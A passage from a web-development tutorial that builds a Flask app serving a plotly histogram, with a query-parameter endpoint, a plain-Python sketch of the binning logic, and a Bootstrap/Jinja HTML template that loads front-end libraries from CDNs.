&lt;p&gt;We want to take the number of bins from a request to our webserver. Rather than taking the number of bins from an argument to our function, we take it from the query arguments of the client’s request. When a Flask application handles a request, it creates a Request object which can be accessed via the &lt;code&gt;request&lt;/code&gt; proxy. Arguments can then be obtained from this context&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;flask&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; request
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;hist&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bins &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; int(request&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;args[&lt;span style="color:#a5d6ff"&gt;&amp;#39;bins&amp;#39;&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;We want the function to be available at a route. The request context only really makes sense within a request from a client. Since the client is going to ask our application to update the histogram depending on their input, we decorate our function with a route decorator&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@app.route&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#39;/graph&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;hist&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Return JSON to send to the client. Instead of returning a figure object, we return some JSON that we can process with JavaScript on the client side&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;json&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;plotly.utils&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; PlotlyJSONEncoder
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@app.route&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#39;/graph&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;hist&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; json&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;dumps(p, cls&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;PlotlyJSONEncoder)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you were to rerun your Flask server now and navigate your browser to &lt;code&gt;localhost:5000/graph?bins=30&lt;/code&gt; you would see the fruit of your labour. It is not a very tasty fruit at the moment though, as all you will see is the raw JSON output for your graph. So let’s put the user interface together.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
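&lt;p&gt;The data flow in the four steps above can also be sketched without Flask, numpy or plotly, which may help when reasoning about what the &lt;code&gt;/graph&lt;/code&gt; endpoint has to do: read &lt;code&gt;bins&lt;/code&gt; from the query string, bin the data, and return JSON. Everything below is an assumption made for illustration: the function names, the fallback to 30 bins when the parameter is missing or invalid, and the small made-up sample of waiting times. The output is a plain dictionary of midpoints and counts, not the plotly figure JSON that the real app returns.&lt;/p&gt;

```python
import json
from urllib.parse import urlparse, parse_qs

# Made-up sample of waiting times; the real app reads data/faithful.csv.
WAITING = [79, 54, 74, 62, 85, 55, 88, 85, 51, 85]


def bins_from_url(url, default=30):
    """Extract the 'bins' query parameter as a positive integer.

    Falls back to `default` when the parameter is missing or not a number.
    """
    query = parse_qs(urlparse(url).query)
    raw = query.get("bins", [str(default)])[0]
    try:
        bins = int(raw)
    except ValueError:
        return default
    return max(bins, 1)  # never allow zero or negative bin counts


def histogram(values, bins):
    """Return (midpoints, counts) for equal-width bins spanning the data."""
    lo, hi = min(values), max(values)
    width = (hi - lo) / bins or 1.0  # avoid a zero width for constant data
    edges = [lo + i * width for i in range(bins + 1)]
    counts = [0] * bins
    for v in values:
        # the maximum value is placed in the last bin
        idx = min(int((v - lo) / width), bins - 1)
        counts[idx] += 1
    mids = [0.5 * (a + b) for a, b in zip(edges[:-1], edges[1:])]
    return mids, counts


def graph(url):
    """Mimic the endpoint: query string in, JSON text out."""
    bins = bins_from_url(url)
    mids, counts = histogram(WAITING, bins)
    return json.dumps({"x": mids, "y": counts})


print(graph("http://localhost:5000/graph?bins=4"))
```

&lt;p&gt;Note that the snippet in step 2 indexes &lt;code&gt;request.args[&amp;#39;bins&amp;#39;]&lt;/code&gt; directly, so a request without a &lt;code&gt;bins&lt;/code&gt; parameter results in an error response. Within Flask itself, &lt;code&gt;request.args.get(&amp;#39;bins&amp;#39;, default=30, type=int)&lt;/code&gt; is one way to get a fallback similar to the one sketched here.&lt;/p&gt;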
&lt;h3 id="creating-the-user-interface"&gt;Creating the user interface&lt;/h3&gt;
&lt;p&gt;We will want to grab a few front end dependencies. For brevity they are included here by linking to the CDN. The shiny app we are mimicking uses bootstrap for its styling, which we will use too. Similarly the &lt;code&gt;sliderInput()&lt;/code&gt; function in {shiny} uses the {ion-rangeslider} JS package, so we will too. We will also take the Plotly JS library (for which the plotly Python package is a wrapper). We will not need to know how to create these plots in JavaScript, but will use the library to take the plot returned from our flask server and render it client side in the browser.&lt;/p&gt;
&lt;p&gt;The head of our HTML file in &lt;code&gt;templates/index.html&lt;/code&gt; then looks like&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&amp;lt;!-- index.html --&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;head&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;meta&lt;/span&gt; charset&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;UTF-8&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;meta&lt;/span&gt; name&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;viewport&amp;#34;&lt;/span&gt; content&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;width=device-width, initial-scale=1.0&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;&amp;lt;!-- additional deps --&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;script&lt;/span&gt; src&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://code.jquery.com/jquery-3.4.1.min.js&amp;#34;&lt;/span&gt; integrity&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=&amp;#34;&lt;/span&gt; crossorigin&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;anonymous&amp;#34;&lt;/span&gt;&amp;gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;script&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;script&lt;/span&gt; src&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js&amp;#34;&lt;/span&gt; integrity&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sha384-Q6E9RHvbIyZFJoft+2mJbHaEWldlvI9IOYy5n3zV9zzTtmI3UksdQRVvoxMfooAo&amp;#34;&lt;/span&gt; crossorigin&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;anonymous&amp;#34;&lt;/span&gt;&amp;gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;script&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;&amp;lt;!-- bootstrap --&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;link&lt;/span&gt; rel&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;stylesheet&amp;#34;&lt;/span&gt; href&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css&amp;#34;&lt;/span&gt; integrity&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh&amp;#34;&lt;/span&gt; crossorigin&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;anonymous&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;script&lt;/span&gt; src&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js&amp;#34;&lt;/span&gt; integrity&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sha384-wfSDF2E50Y2D1uUdj0O3uMBJnjuUD4Ih7YwaYd1iqfktj0Uod8GCExl3Og8ifwB6&amp;#34;&lt;/span&gt; crossorigin&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;anonymous&amp;#34;&lt;/span&gt;&amp;gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;script&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;&amp;lt;!-- ion range slider --&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;&amp;lt;!--Plugin CSS file with desired skin--&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;link&lt;/span&gt; rel&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;stylesheet&amp;#34;&lt;/span&gt; href&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://cdnjs.cloudflare.com/ajax/libs/ion-rangeslider/2.3.0/css/ion.rangeSlider.min.css&amp;#34;&lt;/span&gt;/&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;&amp;lt;!-- JS --&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;script&lt;/span&gt; src&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://cdnjs.cloudflare.com/ajax/libs/ion-rangeslider/2.3.0/js/ion.rangeSlider.min.js&amp;#34;&lt;/span&gt;&amp;gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;script&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;&amp;lt;!-- Plotly --&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;script&lt;/span&gt; src&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://cdn.plot.ly/plotly-latest.min.js&amp;#34;&lt;/span&gt;&amp;gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;script&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;title&lt;/span&gt;&amp;gt;Hello Flask&amp;lt;/&lt;span style="color:#7ee787"&gt;title&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;&amp;lt;!-- Our stylesheet --&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;link&lt;/span&gt; rel&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;stylesheet&amp;#34;&lt;/span&gt; href&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;{{url_for(&amp;#39;static&amp;#39;, filename=&amp;#39;css/app.css&amp;#39;)}}&amp;#34;&lt;/span&gt;&amp;gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&amp;lt;!-- --&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;head&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;{{}}&lt;/code&gt; notation at the bottom here is Jinja syntax. Flask uses Jinja templating to create the web pages that your users will consume. &lt;code&gt;url_for&lt;/code&gt; is a function that is automatically available when you render a template with Flask; it generates URLs to views so that you don’t have to write them out manually. &lt;a href="https://jinja.palletsprojects.com/" rel="external"&gt;Jinja templating&lt;/a&gt; is a really neat way to blend raw markup with your Python variables and functions and some logic statements such as for loops. We haven’t written any styles yet, but we will create the file ready for later, along with somewhere to keep our JavaScript:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mkdir -p static/&lt;span style="color:#ff7b72;font-weight:bold"&gt;{&lt;/span&gt;css,js&lt;span style="color:#ff7b72;font-weight:bold"&gt;}&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; touch static/css/app.css static/js/hist.js
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With all of the dependencies in place it is relatively easy to create a simple layout. We use two columns, 1/4 of the width for the controls and 3/4 for the main content (the &lt;code&gt;col-3&lt;/code&gt; and &lt;code&gt;col-9&lt;/code&gt; classes in Bootstrap’s 12-column grid), with a form to hold our input elements and a container for our histogram that starts out empty. The &lt;code&gt;&amp;lt;body&amp;gt;&lt;/code&gt; of our &lt;code&gt;index.html&lt;/code&gt; is then&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&amp;lt;!-- index.html --&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;body&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;container&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;row&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;col-3&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;title&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Hello Flask!
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;form&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;well&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;label&lt;/span&gt; for&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;bins&amp;#34;&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;control-label&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Bins
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;label&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;input&lt;/span&gt; type&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;text&amp;#34;&lt;/span&gt; id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;bins&amp;#34;&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;js-range-slider&amp;#34;&lt;/span&gt; value&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;form&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;col-9&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;chart&amp;#34;&lt;/span&gt; id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;histogram&amp;#39;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;script&lt;/span&gt; src&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;{{url_for(&amp;#39;static&amp;#39;, filename=&amp;#39;js/hist.js&amp;#39;)}}&amp;#34;&lt;/span&gt;&amp;gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;script&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;body&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We will go back to our &lt;code&gt;app.py&lt;/code&gt; and add the route for this view&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@app.route&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#39;/&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;home&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; render_template(&lt;span style="color:#a5d6ff"&gt;&amp;#39;index.html&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Our full &lt;code&gt;app.py&lt;/code&gt; is then&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# app.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;flask&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; Flask, render_template, request
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; read_csv
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;plotly.express&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;plotly.utils&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; PlotlyJSONEncoder
